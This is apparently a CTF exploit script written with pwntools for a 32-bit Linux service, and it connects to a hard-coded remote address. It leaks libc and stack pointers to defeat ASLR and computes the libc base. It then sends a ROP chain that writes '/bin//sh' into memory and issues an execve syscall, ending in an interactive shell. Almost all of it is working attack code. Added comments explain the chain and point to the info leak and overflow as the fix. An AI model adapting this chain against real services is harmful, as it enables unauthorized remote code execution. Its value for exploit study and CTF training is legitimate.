#!/usr/bin/env python2
# CTF exploit write-up script (pwntools, 32-bit Linux target, Python 2).
#
# Flow as visible below: drain the banner, send a 15-byte line, pull two
# little-endian dwords out of the reply (a libc pointer and a stack pointer),
# derive the libc base from a hard-coded offset, answer a second prompt, then
# send a ROP chain that stores "/bin//sh" plus a NUL dword in memory and
# issues int 0x80 with eax == 11 (execve on i386 Linux).  Every gadget offset
# is specific to one libc build; on any other build the chain simply crashes.
#
# Defensive reading: the chain stands or falls on the information leak in the
# first exchange.  With both a libc pointer and a stack pointer disclosed,
# ASLR no longer protects the process, and the ROP chain needs no further
# guessing.  Fixing the over-read that discloses those pointers (and the
# memory corruption the final sendline drives, presumably a stack overflow
# given the 80 bytes of filler at the head of the chain) removes the foothold.
from pwn import *
from struct import pack,unpack
context(arch = 'i386', os = 'linux', log_level='debug')
#x = process('./vuln')
x = remote('35.198.98.140','45067')  # challenge endpoint from the original write-up
#x = remote('127.0.0.1','6000')
x.recv(timeout=1)  # drain banner/prompt; the timeout keeps a silent service from hanging us
x.sendline('a'*15) # skip 4 bytes
out = x.recv(timeout=1)
# NOTE: `out` is sliced without a length check; a short or empty reply makes
# the unpack() calls below raise struct.error instead of failing cleanly.
setbuf11 = out[28:32] # setbuffer+11 glibc
stack = out[20:24] # some address on stack
setbuf11 = unpack('<I', setbuf11)[0]
stack = unpack('<I', stack)[0]
print format(setbuf11, '08x')
print format(stack, '08x')
good_esp = stack+0xc  # esp value the author wants after the pivot; why +0xc is not visible here
arch_offset = 0x6884b  # unused below (looks like a leftover for a different libc build)
ctf_offset = 0x5fe9b  # distance of the leaked pointer from the libc base on the CTF box
libc_base = setbuf11-ctf_offset
print format(libc_base, '08x')
x.recv(timeout=2.0)
x.sendline('-1')  # answer to the second prompt; why '-1' is the expected input is not visible here
x.recv(timeout=1)
# Padding goes here
#x.sendline('a'*60 + 'a'*60)
#x.recv()
#raw_input("klik")
offset = libc_base  # every gadget below is libc_base + a build-specific offset
# Scratch area for the "/bin//sh\0" string.  It is derived from the leaked
# stack pointer, so despite the "@ .data" comments below the string lives on
# the stack, not in .data.
writem = stack - 64
p = ''
p += pack('<I', 0x61616161) * 20 # stack adjustment
p += pack('<I', good_esp - (6*4))  # presumably lands in the saved frame pointer slot; confirm against the binary
# --- store "/bin" at writem: esi = address, edx = bytes, then *esi = edx ---
p += pack('<I', offset + 0x00017b36) # pop esi ; ret
p += pack('<I', writem + 0x0) # @ .data
p += pack('<I', offset + 0x00001aa6) # pop edx ; ret
p += '/bin'
p += pack('<I', offset + 0x0007e076) # mov dword ptr [esi], edx ; pop ebx ; pop esi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
# --- store "//sh" at writem+4 (same gadget sequence) ---
p += pack('<I', offset + 0x00017b36) # pop esi ; ret
p += pack('<I', writem + 0x4) # @ .data + 4
p += pack('<I', offset + 0x00001aa6) # pop edx ; ret
p += '//sh'
p += pack('<I', offset + 0x0007e076) # mov dword ptr [esi], edx ; pop ebx ; pop esi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
# --- store a zero dword at writem+8: terminates the path and doubles as a NULL argv/envp entry ---
p += pack('<I', offset + 0x00017b36) # pop esi ; ret
p += pack('<I', writem + 0x8) # @ .data + 8
#p += pack('<I', offset + 0x00144437) # xor edx, edx ; pop ebx ; pop esi ; pop edi ; ret
p += pack('<I', offset + 0x0007ddc5) # xor edx, edx ; mov eax, edx ; ret
#p += pack('<I', 0x41414141) # padding
#p += pack('<I', 0x41414141) # padding
#p += pack('<I', 0x41414141) # padding
p += pack('<I', offset + 0x0007e076) # mov dword ptr [esi], edx ; pop ebx ; pop esi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x41414141) # padding
# --- syscall arguments (i386 convention): ebx = path, ecx = argv, edx = envp ---
# argv and envp both point at the zero dword at writem+8, i.e. empty arrays.
p += pack('<I', offset + 0x00017fd5) # pop ebx ; ret
p += pack('<I', writem + 0x0) # @ .data
p += pack('<I', offset + 0x000b5e87) # pop ecx ; ret
p += pack('<I', writem + 0x8) # @ .data + 8
p += pack('<I', offset + 0x00001aa6) # pop edx ; ret
p += pack('<I', writem + 0x8) # @ .data + 8
# --- eax = 0, then eleven increments -> eax == 11 (execve); no "pop eax" gadget was used ---
p += pack('<I', offset + 0x0002c6bc) # xor eax, eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00007f1c) # inc eax ; ret
p += pack('<I', offset + 0x00002c8f) # int 0x80
x.sendline(p)  # the whole chain goes out as one line; sendline appends '\n' after the int 0x80 gadget
x.interactive()